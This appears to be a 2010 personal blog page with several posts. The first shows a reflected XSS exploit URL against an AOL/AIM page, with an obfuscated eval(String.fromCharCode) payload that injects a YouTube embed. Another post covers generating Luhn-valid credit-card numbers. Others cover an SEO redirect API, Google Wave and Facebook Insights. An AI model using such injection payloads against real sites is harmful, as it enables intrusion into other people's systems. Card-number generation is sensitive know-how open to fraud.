search
Carter Cole LinkedInCarters Twitter PageCarter Cole on Facebook Carter Coles RSS

Thursday, August 26, 2010

Attack demonstration of XSS hole in AOL's personalized email landing page

Heres my video about exploiting cross site scripting attacks in the wild, I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 min

See the attack and video live on the page

or watch below (ill have this link live as long as it works)

The javascript we inject is shown below

which url encodes to...
http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E

This is a demonstration of a live attack meant for educational purposes only... if you want to see my copy is here: AOL XSS attack landing page If you are having issues with XSS attacks on your domain or would like help on securing your application, contact me id love to help

P.S. the tool I used to do string encoding is here

Friday, August 6, 2010

New SEO API - HTTP Redirect Chain Test lets you enumerate all the jumps

One of the things that you should know about redirects and SEO is that only 301 Moved Permanently if there is more than one redirect then the crawler will use the "weakest" code it saw... You can test the tool below and see how it behaves... after about 5 redirects GoogleBot will stop following them so my script also cuts off around that point. You can put any url you like below and it will show you the destination url with any hops it makes in between

To see code and use tool you need to be on original post


You can see that this default one makes too many jumps and it cuts off but lets talk about formats and how to use the API. It can return a JSON or JSONP (requires attribution link) and will follow up to 6 redirects and return info about each leg of the journey
This is a sample call, it takes 1 required parameter url= which is url to check and an optional callback= parameter if you want a JSONP response. (an object wrapped in function as output)

Ok heres the example API url

http://cartercole.com/dev/api/redirectchain.asp?callback=testCB&url=http://migre.me/TAVJ
and a sample output from its response... it has a original url, a destination and its status code, as well as an array called "chain" that holds each leg of the jump

I created this for use with new version of SEO Site Tools but im releasing it publicly because I dont know of any other SEO APIs avaiable that do this kind of results so use the tool and I hope you find it useful. If you have questions bother me at one of my social profiles... im pretty sure theres hundreds now :)
built with CarterCole.com tech

Wednesday, August 4, 2010

My postmortem of Google Wave... why i believe that great new wave failed

ok so heres the news:



  • News for google wave

    New Zealand HeraldGoogle Killing 'Wave' Over Lack of Interest? - 4 hours ago
    By SCOTT MORRISON SAN FRANCISCO—Google Inc. said Wednesday it is pulling the plug on its "Google Wave" collaborative messaging service due to a lack of user ...
    Wall Street Journal - 219 related articles »
  • I believe this video is a good point for why it had a rough start... first they released their 90 min video to try and explain the very powerful yet complicated idea and it was just too big for people to understand implications of what they were saying. I was begging, pleading trying to find someone that hookup on the invites, remember they decided to release it like gmail where it was once again the ability to see an exclusive preview into the genius. Like the idea to rewrite the internet with todays knowledge they had reinvented email, and fixed our problems, we could update photo galleries with multiple people on our blog in real time with edits going straight to the web, Rosie the translator bot which promised that globalization would continue even faster was missing in the release. i mean now chrome auto translates for me but then where is the inline translator so i can leave my comments in broken french or whatever? yes you could argue i should just use their API and write it but theres only so much open source code you can write (j/k i dont write that much open source code but im making the effort to release more and be open with my cool new ideas) but im rambling a little with this stream of consciousness post so lets hit a couple more points

    so it can make collaboration on a document a breeze and provide a reviewable history with branches for all versions. but its like three things but all I remember is how complicated it was... i mean its its a protocol its open it can practically do magic. Here are starts at some of my work on wave, i was trying to create an othello like game... it was a game that changed over time greatly and was also based on a board like chess so i thought it would be neat to be able to replay the games. alas i gave up after trying to get the styles to behave correctly and understand how to control state in the wave

    Apparently you cant embed waves you arent a part of... wish now you could make them totally public

    and here is another example of one of few times i ever used wave... pretty dull convo so dont think theres any harm in sharing. It was cool to see real-time typing but all the bubbles and changes all got all caught up. i really think theres a specific type of job wave is good for and isnt really this realtime typing as they first pitched it. people only are writing all over something at the same time if its a get well soon card. all the other time we are reviewing the edits and trying to make our own so them pushing it as going realtime was wrong idea (in my opinion well this whole article is I guess) its history makes seeing and reviewing these edits easy its power isnt in realtime

    Apparently you cant embed waves you arent a part of... wish now you could make them totally public

    its flow was too bad... now for collaborative document editing I think its a think of beauty and I even recommend it if people are all trying to work on website copy I mean the uses that are listed in this original video are incredible...
    i never thought that key by key would be so fast over the wire... but i still feel it was sluggish... not because of network but the speed of JavaScript rendering and rebuilding the DOM tree... with chrome its all gotten much faster but when it was all first starting and there was a free for all on public waves you saw the scalability fail... there was just too much in the documents and they had to lock them down. the version im playing with now is much more polished and looks like they got UI designer in there just a little too late. but there were other things... it needed adoption by a large community of developers for it to grow, the potential for games is so cool because it saves the entire history, so things like chess are very cool... but It was trivial to cheat and I could just tear open the javascript and find the answers to the puzzles saved in the state info.

    So will we ever pick it back up in the future i have no idea... i really think it was cool but the technology just isnt there yet for doing the type of realtime stuff they were first demonstrating. I really think its an awesome product and its sad that its adoption was so slow they had to kill it. Id love to hear your options, add them below or bother me on twitter in @cartercole

    Your credit cards cannot be found by your last 4... and how I learned to generate valid credit card numbers

     So I thought to myself the other day that if there is a checksum on credit cards and we know the type of card and the last 4 that are left on a receipt can we find a small number of valid cards and figure out YOUR number? Now im not a crypto math guy so I knew people must have already handled this... I was right and a cool optimized a luhn function so I could check a million numbers in about 3 sec.

    Ok so lets first talk about where all those numbers come from what we can assume about them and why it doesn't mean a damn thing, heres a valid cc number I generated at random and what we know from it

    4

    0

    3

    7

    1

    8

    1

    9

    2

    2

    7

    9

    0

    4

    2

    0



    Check Digit

    Bank Id

    On receipt

    Unknown

    I learned the first 6 digits are a bank id and after digging around awhile i made this fusion table public to hold the data. Its way cool cuz now we can lookup what type of card it is and where it came from... i dont know why we ever ask debit or credit. so then i learned how the checksum works and got this optimized version of the luhn checksum algorythm or mod 10 as its sometimes called because after you do this little trick you look to see if the number is evenly divisible by 10.
    because of the way this works it turns out that for a million number there are about 100k valid numbers in that bunchso wrapping this up i found that there are tons of numbers and its trivial to make valid ones, and they only work if you have the expiration date so i deem the numbers are safe for now...
    ill release some code on how you can use the fusion table to lookup cards bank and origin later

    oh and heres 100k valid cc numbers :)

    Tuesday, August 3, 2010

    Get Facebook Insights about your domain! now not just fan page stats...

    I was dinking around with Facebook graph API and Facebook connect and saw there is updated insights pages now... Ive seen my weekly stats for my fan page but then I saw little button to add a domain.

    Heres the tag i threw in my <head> tag...


    And thats all it took... i added both my root and subdomains because it lists as "all pages under www.cartercole.com and i didnt add the www so heres a peek at stats about likes and shares as well as demographics if you get enough clout...

    I never knew this had been rolled out so if your trying to monitor your social reach on your sight you definably need to create your fanpage and verify ownership of your domain on insights

    Facebook Insights add your domain today!